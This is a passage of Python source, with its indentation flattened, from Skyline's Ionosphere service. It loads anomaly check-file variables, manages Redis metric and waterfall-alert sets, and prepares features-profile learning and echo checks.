redis_ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('the new Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Manage ionosphere_untrainable_metrics Redis set
ionosphere_untrainable_metrics = []
ionosphere_untrainable_metrics_redis_set = 'ionosphere.untrainable_metrics'
try:
ionosphere_untrainable_metrics = list(self.redis_conn_decoded.smembers(ionosphere_untrainable_metrics_redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the ionosphere.untrainable_metrics set from Redis')
if ionosphere_untrainable_metrics:
ionosphere_untrainable_metrics_check_time = int(time())
for ionosphere_untrainable_metric_str in ionosphere_untrainable_metrics:
try:
ionosphere_untrainable_metric = literal_eval(ionosphere_untrainable_metric_str)
ium_remove_after_timestamp = int(ionosphere_untrainable_metric[6])
if ionosphere_untrainable_metrics_check_time >= ium_remove_after_timestamp:
try:
self.redis_conn.srem(ionosphere_untrainable_metrics_redis_set, str(ionosphere_untrainable_metric))
logger.info('removed item - %s - from Redis set - %s' % (str(ionosphere_untrainable_metric), ionosphere_untrainable_metrics_redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove item list from Redis set - %s' % ionosphere_untrainable_metrics_redis_set)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to manage Redis set %s' % ionosphere_untrainable_metrics_redis_set)
return True
# @added 20161230 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
def new_load_metric_vars(self, metric_vars_file):
"""
Load the metric variables for a check from a metric check variables file
:param metric_vars_file: the path and filename to the metric variables files
:type metric_vars_file: str
:return: the metric_vars list or ``False``
:rtype: list
"""
if os.path.isfile(metric_vars_file):
logger.info(
'loading metric variables from metric_check_file - %s' % (
str(metric_vars_file)))
else:
logger.error(
'error :: loading metric variables from metric_check_file - file not found - %s' % (
str(metric_vars_file)))
return False
metric_vars = []
with open(metric_vars_file) as f:
for line in f:
no_new_line = line.replace('\n', '')
no_equal_line = no_new_line.replace(' = ', ',')
array = str(no_equal_line.split(',', 1))
add_line = literal_eval(array)
metric_vars.append(add_line)
string_keys = ['metric', 'anomaly_dir', 'added_by', 'app', 'source']
float_keys = ['value']
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
int_keys = [
'from_timestamp', 'metric_timestamp', 'added_at', 'full_duration',
'ionosphere_parent_id']
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
array_keys = ['triggered_algorithms', 'algorithms', 'algorithms_run']
boolean_keys = ['graphite_metric', 'run_crucible_tests']
metric_vars_array = []
for var_array in metric_vars:
key = None
value = None
if var_array[0] in string_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = str(value_str)
if var_array[0] == 'metric':
metric = value
if var_array[0] in float_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = float(value_str)
if var_array[0] in int_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = int(value_str)
if var_array[0] in array_keys:
key = var_array[0]
value = literal_eval(str(var_array[1]))
if var_array[0] in boolean_keys:
key = var_array[0]
if str(var_array[1]) == 'True':
value = True
else:
value = False
if key:
metric_vars_array.append([key, value])
if len(metric_vars_array) == 0:
logger.error(
'error :: loading metric variables - none found' % (
str(metric_vars_file)))
return False
logger.info('debug :: metric_vars for %s' % str(metric))
logger.info('debug :: %s' % str(metric_vars_array))
return metric_vars_array
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the spawn_learn_process after determining to is not fit to bolt learn
# inside of ionosphere.py in its entirety, no point in more conditional nesting
# and bulking up ionosphere.py with more learn parameter to spin_process etc
# ionosphere.py works, as good as it gets, so extended with learn.py. This uses
# the same no memory leak pattern that was adopted for smtp_alerts.
def spawn_learn_process(self, i, timestamp):
"""
Spawn a process to learn.
This is used for Ionosphere to learn if anomalous metrics remain
anomalous over time, as the resolution decreases. It follows the
multiprocessing methodology the was introduced in Analyzer and Mirage
in the context of the process objects being cleared down and the learn
processes cannot create memory leaks as the process always terminates or
is terminated this prevents any memory leaks in the parent.
"""
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# learn(timestamp)
ionosphere_learn(timestamp)
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
def process_ionosphere_echo(self, i, metric_check_file):
"""
Spawn a process_ionosphere_echo check to create features profiles at
settings.FULL_DURATION for Mirage metrics
:param i: python process id
:param metric_check_file: full path to the metric check file
:type i: object
:type metric_check_file: str
:return: boolean
:rtype: boolean
"""
try:
# Load and validate metric variables
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: process_ionosphere_echo :: failed to load metric variables from check file - %s' % (metric_check_file))
return
added_by = None
try:
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: process_ionosphere_echo failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
return
if added_by != 'mirage':
# @modified 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Allow to be added by webapp
if added_by == 'webapp':
logger.info('process_ionosphere_echo :: metric added_by %s OK' % added_by)
else:
logger.info('process_ionosphere_echo :: only mirage metrics are processed not metrics added_by %s' % added_by)
return
metric = None
try:
# metric_vars.metric
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: process_ionosphere_echo failed to load metric variable from check file - %s' % (metric_check_file))
return
# @added 20190413 - Feature #2484: FULL_DURATION feature profiles
# Only process if it is an ionosphere enabled metric
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
ionosphere_unique_metrics = []
if ionosphere_unique_metrics:
# @modified 20190413 - Bug #2942: process_ionosphere_echo metric mismatch
# Feature #2484: FULL_DURATION feature profiles
# Matching bug for not in list comprehension it must be an absolute
# match
# if not metric in ionosphere_unique_metrics:
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric))
# @modified 20190522: Task #3034: Reduce multiprocessing Manager list usage
# if not metric_name in ionosphere_unique_metrics:
if metric_name not in ionosphere_unique_metrics:
# @modified 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Allow metrics added by webapp to skip this check as they may
# be new ionosphere metrics and not be in the ionosphere.unique_metrics
# set yet
if added_by == 'webapp':
logger.info('process_ionosphere_echo :: %s is not in ionosphere.unique_metrics but added by webapp so possibly a new metric' % metric)
else:
logger.info('process_ionosphere_echo :: only ionosphere enabled metrics are processed, skipping %s' % metric)
return
full_duration = None
try:
# metric_vars.full_duration
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: process_ionosphere_echo failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
return
logger.info('process_ionosphere_echo :: processing - %s' % (metric))
ionosphere_echo(metric, full_duration)
# @modified 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added the ionosphere_busy parameter
# def spin_process(self, i, metric_check_file):
def spin_process(self, i, metric_check_file, ionosphere_busy):
"""
Assign an anomalous metric to check against features profiles.
:param i: python process id
:param metric_check_file: full path to the metric check file
:param ionosphere_busy: whether to Ionosphere manage and alternate
between normal Ionosphere and echo analysis
:type i: object
:type metric_check_file: str
:type ionosphere_busy: boolen
:return: int
:rtype: int or boolean
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
logger.error(traceback.format_exc())
log_msg = 'error :: failed to get MySQL engine in spin_process'
logger.error('error :: failed to get MySQL engine in spin_process')
return None, log_msg, trace
def engine_disposal(engine):
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
return
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
def remove_waterfall_alert(added_by, metric_timestamp, base_name):
redis_waterfall_alert_set = '%s.waterfall_alerts.sent_to_ionosphere' % added_by
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_waterfall_alert_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_timestamp):
try:
self.redis_conn.srem(redis_waterfall_alert_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_waterfall_alert_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_waterfall_alert_set))
# @added 20201128 - Feature #3734: waterfall alerts
# If the check just done is newer than an existing mirage
# waterfall alert metric timestamp remove those keys as well
if int(waterfall_alert[1]) < metric_timestamp:
try:
self.redis_conn.srem(redis_waterfall_alert_set, str(waterfall_alert))
logger.info('removed waterfall alert item with older timestamp from Redis set %s - %s' % (
redis_waterfall_alert_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_waterfall_alert_set))
return
# @added 20200908 - Feature #3734: waterfall alerts
# Added a common return_to_sender_to_alert function
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
def return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run):
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration, algorithms_run]
try:
self.redis_conn.setex(cache_key, 300, str(cache_key_value))
logger.info('added Redis alert key - %s - %s' % (
cache_key, str(cache_key_value)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
(cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
str(triggered_algorithms), str(full_duration), str(algorithms_run)))
return
child_process_pid = os.getpid()
logger.info('child_process_pid - %s' % str(child_process_pid))
try:
ionosphere_max_runtime = settings.IONOSPHERE_MAX_RUNTIME
except:
ionosphere_max_runtime = 120
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: processing metric check - %s' % metric_check_file)
if not os.path.isfile(str(metric_check_file)):
logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
return
engine = None
anomalous_timeseries = False
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
failed_check_file = '%s/%s' % (metric_failed_check_dir, check_file_name)
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: failed_check_file - %s' % failed_check_file)
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# From batch_processing metrics the learn check is being added and
# removed as the learn check for batch metrics happens immediately as
# the learn after duration can have passed. To the check file needs to
# be loaded to determine if was added by ionosphere_learn before the
# check is just removed.
removed_check_file_work_done = False
# @added 20170307 - Feature #1960: ionosphere_layers - ionosphere_check_cache_key
# This Redis cache key check was added to prevent Ionosphere from
# running riot on checks if for some reason the check_file is not
# removed which happens if some exception is not handled as found out
# again during yesterday's development of run_layer_algorithms. It was
# a good reminder of how fast Skyline can iterate.
ionosphere_check_cache_key = 'ionosphere.check.%s' % check_file_name
check_done = False
try:
check_done = self.redis_conn.get(ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('check done check - no check cache key - %s' % ionosphere_check_cache_key)
else:
# @modified 20181113 - Task #2680: Remove Ionosphere check files is key exists
# This was here for initially debugging, no longer needed
# logger.error('error :: a check cache key exists - %s' % ionosphere_check_cache_key)
# logger.error('error :: failing check to prevent multiple iterations over this check')
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
logger.info('a check cache key exists - %s' % (ionosphere_check_cache_key))
# @modified 20200807 - Feature #3480: batch_processing
# logger.info('to prevent multiple iterations over this check removing %s' % (
logger.info('to prevent multiple iterations over this check it will be removed if not added by ionosphere_learn - %s' % (
str(metric_check_file)))
# self.remove_metric_check_file(str(metric_check_file))
# return
# @added 20200807 - Feature #3480: batch_processing
removed_check_file_work_done = True
try:
check_process_start = int(time())
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# redis-py 3.x only accepts user data as bytes, strings or
# numbers (ints, longs and floats). All 2.X users should
# make sure that the keys and values they pass into redis-py
# are either bytes, strings or numbers. Added cache_key_value
# self.redis_conn.setex(
# ionosphere_check_cache_key, 300, [check_process_start])
self.redis_conn.setex(
ionosphere_check_cache_key, 300, check_process_start)
logger.info(
'added Redis check key - %s' % (ionosphere_check_cache_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis check key - %s' % (ionosphere_check_cache_key))
logger.error('error :: failing check to prevent multiple iterations over this check')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# Load and validate metric variables
# @modified 20161231 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
# Use def new_load_metric_vars(self, metric_vars_file):
# metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# Test metric variables
# We use a pythonic methodology to test if the variables are defined,
# this ensures that if any of the variables are not set for some reason
# we can handle unexpected data or situations gracefully and try and
# ensure that the process does not hang.
metric = None
try:
# metric_vars.metric
# metric = str(metric_vars.metric)
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
base_name = metric
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
value = None
try:
# metric_vars.value
# value = str(metric_vars.value)
key = 'value'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
value = float(value_list[0])
anomalous_value = value
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - value - %s' % str(value))
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
value = None
if not value:
# @modified 20181119 - Bug #2708: Failing to load metric vars
if value == 0.0:
pass
else:
logger.error('error :: failed to load value variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
from_timestamp = None
try:
# metric_vars.from_timestamp
# from_timestamp = str(metric_vars.from_timestamp)
key = 'from_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
from_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - from_timestamp - %s' % str(from_timestamp))
except:
# @added 20160822 - Bug #1460: panorama check file fails
# Added exception handling here
logger.info(traceback.format_exc())
logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
if not from_timestamp:
logger.error('error :: failed to load from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
metric_timestamp = None
try:
# metric_vars.metric_timestamp
# metric_timestamp = str(metric_vars.metric_timestamp)
key = 'metric_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric_timestamp - %s' % str(metric_timestamp))
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
metric_timestamp = None
if not metric_timestamp:
logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# metric_vars.algorithms
# algorithms = metric_vars.algorithms
key = 'algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms - %s' % str(algorithms))
except:
logger.error('error :: failed to read algorithms variable from check file setting to all - %s' % (metric_check_file))
algorithms = 'all'
try:
# metric_vars.triggered_algorithms
# triggered_algorithms = metric_vars.triggered_algorithms
key = 'triggered_algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
triggered_algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - triggered_algorithms - %s' % str(triggered_algorithms))
except:
logger.error('error :: failed to read triggered_algorithms variable from check file setting to all - %s' % (metric_check_file))
triggered_algorithms = 'all'
added_by = None
try:
# metric_vars.added_by
# added_by = str(metric_vars.added_by)
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
try:
key = 'algorithms_run'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms_run = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms_run - %s' % str(algorithms_run))
except:
logger.error('error :: failed to read algorithms_run variable from check file setting to all - %s' % (metric_check_file))
if added_by == 'mirage':
algorithms_run = settings.MIRAGE_ALGORITHMS
else:
algorithms_run = settings.ALGORITHMS
# @added 20170117 - Feature #1854: Ionosphere learn - generations
if str(added_by) == 'ionosphere_learn':
logger.info('debug :: metric variable - added_by - %s' % added_by)
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
if removed_check_file_work_done:
logger.info('this check was added by ionosphere_learn so not removing check even though a check done Redis key exists')
removed_check_file_work_done = False
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
if removed_check_file_work_done:
logger.info('a check cache key exists and the check was not added by ionosphere_learn - %s' % (ionosphere_check_cache_key))
logger.info('to prevent multiple iterations over this check removing %s' % (
str(metric_check_file)))
# @added 20200908 - Feature #3734: waterfall alerts
# Remove waterfall alert item
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
return
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If added_by is analyzer_batch, log and change to analyzer so that
# Ionosphere routes any alerts back to anaylzer
if str(added_by) == 'analyzer_batch':
logger.info('metric variable - added_by - %s, now switching to analyzer to route alerts to anlayzer, thanks analyzer_batch' % added_by)
added_by = 'analzyer'
logger.info('metric variable - added_by - %s, analyzer_batch checks will have alerts routed to analyzer' % added_by)
try:
# metric_vars.added_at
# added_at = str(metric_vars.added_at)
key = 'added_at'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_at = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_at - %s' % str(added_at))
except:
logger.error('error :: failed to read added_at variable from check file setting to all - %s' % (metric_check_file))
added_at = metric_timestamp
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Added full_duration which needs to be recorded to allow Mirage metrics
# to be profiled on Redis timeseries data at FULL_DURATION
full_duration = None
try:
# metric_vars.full_duration
# full_duration = str(metric_vars.full_duration)
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = None
ionosphere_parent_id_determined = False
try:
key = 'ionosphere_parent_id'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
ionosphere_parent_id = int(value_list[0])
ionosphere_parent_id_determined = True
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - ionosphere_parent_id - %s' % str(ionosphere_parent_id))
except:
logger.error('error :: failed to read ionosphere_parent_id variable from check file - %s' % (metric_check_file))
ionosphere_parent_id = None
if not ionosphere_parent_id_determined:
logger.error('error :: failed to determine ionosphere_parent_id variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @modified 20170116 - Feature #1854: Ionosphere learn
# Do not check the cache key or anomaly age if added by ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20170101 - Feature #1830: Ionosphere alerts
# Remove check file if an alert key exists
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
logger.info('no alert cache key - %s' % cache_key)
else:
logger.info('removing check - alert cache key exists - %s' % cache_key)
# @added 20200908 - Feature #3734: waterfall alerts
# Remove any waterfall_alert items
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
return
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Do not evaluate batch metrics against max_age_seconds
analyzer_batch_anomaly = None
if BATCH_PROCESSING:
# Is this a analyzer_batch related anomaly?
analyzer_batch_anomaly = None
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(metric_timestamp), metric)
try:
analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('batch processing - not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if analyzer_batch_anomaly:
logger.info('batch anomaly not checking max_age_seconds for %s' % analyzer_batch_metric_anomaly_key)
else:
# @modified 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Wrapped in if analyzer_batch_anomaly
now = time()
anomaly_age = int(now) - int(metric_timestamp)
if anomaly_age > max_age_seconds:
logger.info(
'Ionosphere check max age exceeded - %s - %s seconds old, older than %s seconds discarding' % (
metric, str(anomaly_age), str(max_age_seconds)))
with open(metric_check_file, 'rt') as fr:
metric_check_file_contents = fr.readlines()
logger.info(
'debug :: metric check file contents\n%s' % (str(metric_check_file_contents)))
self.remove_metric_check_file(str(metric_check_file))
return
else:
logger.info('processing check_file for ionosphere_learn - %s' % str(metric_check_file))
# @added 20161222 - ionosphere should extract features for every anomaly
# check that is sent through and calculate a feature_profile ready for
# submission by the user if they so choose. Further ionosphere could
# make itself more useful by comparing any training data profiles to
# further anomalies, however the feature profiles for subsequent
# anomalies may be similar enough to match a few times and each a closer
# match to the next.
training_metric = False
metrics_id = None
metric_ionosphere_enabled = None
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the metrics_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
# the generations values avaialble in it. Here we go! Learn!
metrics_db_object = None
# @modified 20190325 - Feature #2484: FULL_DURATION feature profiles
# Moved get_metrics_db_object block to common_functions.py
try:
metrics_db_object = get_metrics_db_object(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine metrics_db_object from get_metrics_db_object for %s' % base_name)
if metrics_db_object:
metrics_id = None
try:
metrics_id = int(metrics_db_object['id'])
except:
# @added 20190509 - Bug #2984: Ionosphere - could not determine values from metrics_db_object
# Added a traceback here to debug an issue
logger.error(traceback.format_exc())
logger.error('error :: could not determine id from metrics_db_object for %s' % base_name)
metrics_id = None
metric_ionosphere_enabled = None
training_metric = True
if metrics_id:
# @modified 20190510 - Bug #2984: Ionosphere - could not determine values from metrics_db_object
# metric_ionosphere_enabled = int(metrics_db_object['ionosphere_enabled'])
metric_ionosphere_enabled = None
try:
metric_ionosphere_enabled = metrics_db_object['ionosphere_enabled']
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled from metrics_db_object for %s' % base_name)
if metric_ionosphere_enabled is not None:
training_metric = False
else:
training_metric = True
if metric_ionosphere_enabled == 1:
training_metric = False
if metric_ionosphere_enabled == 0:
training_metric = True
else:
metrics_id = None
metric_ionosphere_enabled = None
training_metric = True
logger.error('error :: could not determine metric id from memcache or metrics tables for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if namespace has matched multiple times in the
# last 10 minutes. However determining which Skyline related metrics
# are feeding back are quite difficult to ascetain. So use the
# ionosphere_busy logic again and use or find the skyline host namespace
# and if busy do not analyse the Skyline host namespace while
# ionosphere is busy.
feedback_metric = False
if ionosphere_busy:
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
break
if feedback_metric:
cache_key = 'ionosphere.feedback_metric.checked.%s' % (base_name)
logger.info('feedback metric identified adding Redis key with 600 TTL - %s' % cache_key)
try:
self.redis_conn.setex(cache_key, 600, int(time()))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s key to Redis' % (
str(cache_key)))
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is a match.
metric_max_generations = None
if added_by == 'ionosphere_learn':
try:
metric_max_generations = int(metrics_db_object['max_generations'])
logger.info('determing max_generations for ionosphere_learn check - %s - %s' % (str(metric_max_generations), base_name))
except:
logger.error(traceback.format_exc())
